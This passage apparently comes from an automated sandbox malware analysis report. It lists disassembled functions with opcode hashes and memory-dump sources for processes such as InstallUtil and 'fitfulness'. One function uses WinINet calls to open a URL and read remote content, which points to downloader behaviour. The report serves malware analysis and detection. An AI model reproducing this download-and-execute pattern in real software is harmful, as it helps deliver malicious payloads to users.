                                                                                          • Opcode ID: 7dd790ee989f705813b15cda756c72c1c8223fce16a247ad71dccec4b548f2c1
                                                                                          • Instruction ID: 0a070458e935d821313a690cbfd8452f4fa279662c00df130e18f9cf70d41748
                                                                                          • Opcode Fuzzy Hash: 7dd790ee989f705813b15cda756c72c1c8223fce16a247ad71dccec4b548f2c1
                                                                                          • Instruction Fuzzy Hash: 24E0C274909208EBC704DFA4E9406ECBBB8EB86300F10819AC80813350C7315E03DBA1
                                                                                          Function 00E81447 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90440418831c2f78ec591e55f3497a3af3dff714d8cfeee8b3ca42eba5da79d8
                                                                                          • Instruction ID: 7ad11c9d659ff304459e311988469f29b35a7008ae458ce13ef528d45c44237a
                                                                                          • Opcode Fuzzy Hash: 90440418831c2f78ec591e55f3497a3af3dff714d8cfeee8b3ca42eba5da79d8
                                                                                          • Instruction Fuzzy Hash: 6CD05E30848120CED794BB22AC042BC2334EF00381B955860C58D7B210DB28690E87E2
                                                                                          Function 074BE848 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1761946686.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_74a0000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 27d29924e096946de568e1a6faa565673ec40b9b9e5d4aef2065da1da8fd9b1c
                                                                                          • Instruction ID: 3cd36d71c2bb70577a26f6f4d5b121333ff66dcbab35cd2ceca9da48aa0df4f8
                                                                                          • Opcode Fuzzy Hash: 27d29924e096946de568e1a6faa565673ec40b9b9e5d4aef2065da1da8fd9b1c
                                                                                          • Instruction Fuzzy Hash: 82C02BB004FF8D87C1201358A80C3F972FC834B301F441C07820D021708FB00C00C675
                                                                                          Function 00E8F080 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c96cd132ba53d33e1a96adea596902728738e342167ca8cd75e9c5a54ea5d1d5
                                                                                          • Instruction ID: a3d9d362f39bbd17ed98f9183c5bc833404d06e44aa24aa9902bd7563c7ed617
                                                                                          • Opcode Fuzzy Hash: c96cd132ba53d33e1a96adea596902728738e342167ca8cd75e9c5a54ea5d1d5
                                                                                          • Instruction Fuzzy Hash: 3FC08C3010030C9FC2507BA8FC0C32CB3686B22306F400062D60E902654BB00880C76A
                                                                                          Function 00E842B2 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4765c445ee0e2e7271518e46c103aa3b6aaf4d8a744f20a3cab3cb8a8f9666b0
                                                                                          • Instruction ID: a0c3c52aee8e2ad8ead373678d4254c9dc930feb0132cf4f7fed4eca530d2c18
                                                                                          • Opcode Fuzzy Hash: 4765c445ee0e2e7271518e46c103aa3b6aaf4d8a744f20a3cab3cb8a8f9666b0
                                                                                          • Instruction Fuzzy Hash: C4B0925698E3A94ED7C6233988603802F622B43B45FDA00C2C0C4CB0AAD108480F832B
                                                                                          Function 00E82A2D Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad6ee054b824c3bce8d033964a222fd0d8cc04a29192e255cf704db6d6d7b8b4
                                                                                          • Instruction ID: c15791a48bf241759a7ee8092a5d589f563a5e991debc8547f7ea432f72cca36
                                                                                          • Opcode Fuzzy Hash: ad6ee054b824c3bce8d033964a222fd0d8cc04a29192e255cf704db6d6d7b8b4
                                                                                          • Instruction Fuzzy Hash: 87C09BB0D043849FE7925F7984407E92D9D8745310F145566810DD22D1F8244D455331
                                                                                          Function 00E80890 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71d2c5d29dc6554407647923624d1326b8baf22b5ae9426af326ac54fa487b3d
                                                                                          • Instruction ID: f03017fecec955bc8488c4b505299deeff49b760eac2b165c8613666f87200e5
                                                                                          • Opcode Fuzzy Hash: 71d2c5d29dc6554407647923624d1326b8baf22b5ae9426af326ac54fa487b3d
                                                                                          • Instruction Fuzzy Hash: 8090023104870CCB464027957C095B5775CAA445157C44051A50D816115B55641085A5

                                                                                          Executed Functions

                                                                                          Function 006B0888 Relevance: .1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1646873222.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_6b0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b0b7e9f43480899c87cfe413093786412cd73cd3330bd11434d894c6547eed8
                                                                                          • Instruction ID: 7b2a41f2fab0f5402f09cea1785363f0eb33e46637bbe642e9d5caab416a6ae9
                                                                                          • Opcode Fuzzy Hash: 5b0b7e9f43480899c87cfe413093786412cd73cd3330bd11434d894c6547eed8
                                                                                          • Instruction Fuzzy Hash: 82410975B002108FD798EF78C458A6E7BE2AF8971572114A9E406CF376DE75DC42CB90
                                                                                          Function 006B0898 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1646873222.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_6b0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1c4d0184aad77ad16fbcebbe6a51525114333aca07672394989ba94674d53418
                                                                                          • Instruction ID: eb5d594f249329a4c3c2371cc3cd40da0d1e43108e892ee046a2e0cfcacfb24b
                                                                                          • Opcode Fuzzy Hash: 1c4d0184aad77ad16fbcebbe6a51525114333aca07672394989ba94674d53418
                                                                                          • Instruction Fuzzy Hash: EE41F775B002108FD798EF78C858A2E7BE2AF8971172158A9E506CF376DE75DC42CB90
                                                                                          Function 006B0A40 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1646873222.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_6b0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e306e591c73fe38147ebc65933c896d5ee220d31de83c0cb0b02e8b60b045f1e
                                                                                          • Instruction ID: 6ba8406a0f796c15db57247b232b2943855acc64b165617baf7aad6b7cbfa297
                                                                                          • Opcode Fuzzy Hash: e306e591c73fe38147ebc65933c896d5ee220d31de83c0cb0b02e8b60b045f1e
                                                                                          • Instruction Fuzzy Hash: 002104727043119FE7149A7DEC80BFB7FAAEF84711B24457AE409D7282DA32DC928390
                                                                                          Function 006B0848 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1646873222.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_6b0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e865db5be314ac29724b84ddfce8763181e81ed143a257b6fa9f7768b0a8266
                                                                                          • Instruction ID: 2b5c2969d57045ce274511f1d54a9955f40affa98ea77427a21dd93104f2458a
                                                                                          • Opcode Fuzzy Hash: 8e865db5be314ac29724b84ddfce8763181e81ed143a257b6fa9f7768b0a8266
                                                                                          • Instruction Fuzzy Hash: B7E0E670D0020DEFCB54EFB9D941A5DB7EAEB4424071045A9D408A7255D931AF019B95
                                                                                          Function 006B0A10 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1646873222.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_6b0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ceb716d2ac8c3322bee9307f54a78f9fd94a0133d69b2fa8f3805c1a07816674
                                                                                          • Instruction ID: fa5e4153918d84b15ef3b3fac5cab3eb8b236b85089109da7c68f80617a8f7ee
                                                                                          • Opcode Fuzzy Hash: ceb716d2ac8c3322bee9307f54a78f9fd94a0133d69b2fa8f3805c1a07816674
                                                                                          • Instruction Fuzzy Hash: 30D0C775F442148FDA14AF78D45449CB761EF8837531006A5D135C72A1D631D816C715

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:53.8%
                                                                                          Total number of Nodes:13
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 16047 42d1c0 16049 42d1e3 16047->16049 16048 42d40e 16049->16048 16051 433c40 16049->16051 16053 433cee 16051->16053 16052 434097 16052->16049 16053->16052 16055 4330d0 16053->16055 16056 433122 InternetOpenA 16055->16056 16058 4331a6 16056->16058 16059 4331e3 InternetOpenUrlA 16058->16059 16062 4331ee 16058->16062 16059->16062 16060 433344 16060->16052 16061 43328d InternetReadFile 16061->16062 16062->16060 16062->16061

                                                                                          Executed Functions

                                                                                          Function 004330D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236networkfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 6089 4330d0-433128 6091 43313a-43314e 6089->6091 6092 43312a-43312f 6089->6092 6094 433150-433158 6091->6094 6095 43315f-433172 6091->6095 6092->6091 6094->6095 6097 433183-4331c6 InternetOpenA 6095->6097 6098 433174-43317c 6095->6098 6103 433208-43320d 6097->6103 6104 4331c8-4331ea InternetOpenUrlA 6097->6104 6098->6097 6105 433213-433262 6103->6105 6106 433347-43339e 6103->6106 6110 4331ee-4331ff 6104->6110 6122 43326b-433270 6105->6122 6110->6103 6123 433276-433303 InternetReadFile 6122->6123 6124 433344 6122->6124 6134 43330a-433333 6123->6134 6124->6106 6134->6122 6139 433339-43333f 6134->6139 6139->6122
                                                                                          APIs
                                                                                          • InternetOpenA.WININET(00000000), ref: 00433197
                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000000,00000000,04000000,00000000), ref: 004331E5
                                                                                          • InternetReadFile.WININET(?,00000000), ref: 00433292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2545978610.0000000000428000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000B.00000002.2545978610.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$Open$FileRead
                                                                                          • String ID: p,@
                                                                                          • API String ID: 72386350-3831339900
                                                                                          • Opcode ID: ce8fd7a5beead90c63d9c850b0d899ec84a69253050749c09537f13bbf4a122a
                                                                                          • Instruction ID: e94e2d4ba996024a36e93b395fc0c15a9e4d070ad0bcac0b2d17bce1973d2d61
                                                                                          • Opcode Fuzzy Hash: ce8fd7a5beead90c63d9c850b0d899ec84a69253050749c09537f13bbf4a122a
                                                                                          • Instruction Fuzzy Hash: 5A81FEB5A00209AFDB04DFE5DD85EEEBB7DEF48701F10811AF601B72A0DA749945CB64

                                                                                          Executed Functions

                                                                                          Function 008E04EC Relevance: .4, Instructions: 449COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4a86a6ff3dd66ad9141733f29152620bb04e0932da4b840546a154180c6d6d0
                                                                                          • Instruction ID: a301d8f904639fd7835c31e07244169fe6e45da56e13fb082ec68583135152a1
                                                                                          • Opcode Fuzzy Hash: a4a86a6ff3dd66ad9141733f29152620bb04e0932da4b840546a154180c6d6d0
                                                                                          • Instruction Fuzzy Hash: EAF08C70909388DFCB12DFB8E851A8DBFF5AF4630071005EAC048EB263D6749E06CB21
                                                                                          Function 008E0888 Relevance: .1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 214e16ebf76e0cc21e5efbf82581fc0e9c0eed1e5ce393101aa3bc40cb69e45d
                                                                                          • Instruction ID: 2c93f81e2920447c6d22d52589626222318f8b598bf242dcb22b45d2ac08eef5
                                                                                          • Opcode Fuzzy Hash: 214e16ebf76e0cc21e5efbf82581fc0e9c0eed1e5ce393101aa3bc40cb69e45d
                                                                                          • Instruction Fuzzy Hash: AF410675B002148FC798AF79C458A2D7BE2FF8971176108A9E406CF376DA75DC42CB90
                                                                                          Function 008E0898 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d51294ea49b5cb41613504c872dffa05ce2268aac3826354f603bd533e2c769c
                                                                                          • Instruction ID: 1f0514693f836f07703fb4f7fd5405350371e4aac52804d31eb557254c1ab86a
                                                                                          • Opcode Fuzzy Hash: d51294ea49b5cb41613504c872dffa05ce2268aac3826354f603bd533e2c769c
                                                                                          • Instruction Fuzzy Hash: E6410635B002148FC798AF79C858A2D7BE2BF8971172108A9E406CF376DA75DC42CB90
                                                                                          Function 008E0A40 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: be1af547103c9543678d5734c87d3d4c01831f76b16395a890404e81db935370
                                                                                          • Instruction ID: 545333857ba0786bb065ef1140333cd3a30dcbdf2ddf2aaa916d6c3a4f16da04
                                                                                          • Opcode Fuzzy Hash: be1af547103c9543678d5734c87d3d4c01831f76b16395a890404e81db935370
                                                                                          • Instruction Fuzzy Hash: 052126327043698FD7148B7EE880B3A7BE9FF85724B18453AD009D7281DAB2DC828B50
                                                                                          Function 008E0848 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae02d9331327d9cae0e096e4057de79415b2bf5c9491c93bb1f50667efecf677
                                                                                          • Instruction ID: d654b600c087e5aa5202f79a59c1f5c64c754a9f62f17856338cc4aaf60fdf7c
                                                                                          • Opcode Fuzzy Hash: ae02d9331327d9cae0e096e4057de79415b2bf5c9491c93bb1f50667efecf677
                                                                                          • Instruction Fuzzy Hash: 19E0E670D0020DEFCB54EFB9D941A5DB7EAEB4424071045A9D408E7255D931AF019B95
                                                                                          Function 008E0A10 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1729311400.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_8e0000_fitfulness.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4bf56881465077a166ac00c18a844a9a3c619db8c04d3e16e061821b150b4b1a
                                                                                          • Instruction ID: 1cfe19380a2136920f9cbcbb053feaffddbf127ba0e61c1ffa9ceb679a90c9a1
                                                                                          • Opcode Fuzzy Hash: 4bf56881465077a166ac00c18a844a9a3c619db8c04d3e16e061821b150b4b1a
                                                                                          • Instruction Fuzzy Hash: BDD0A735F002188FCA14AF78D40445CB760EF8433531006B1D135C72A1D630C811C611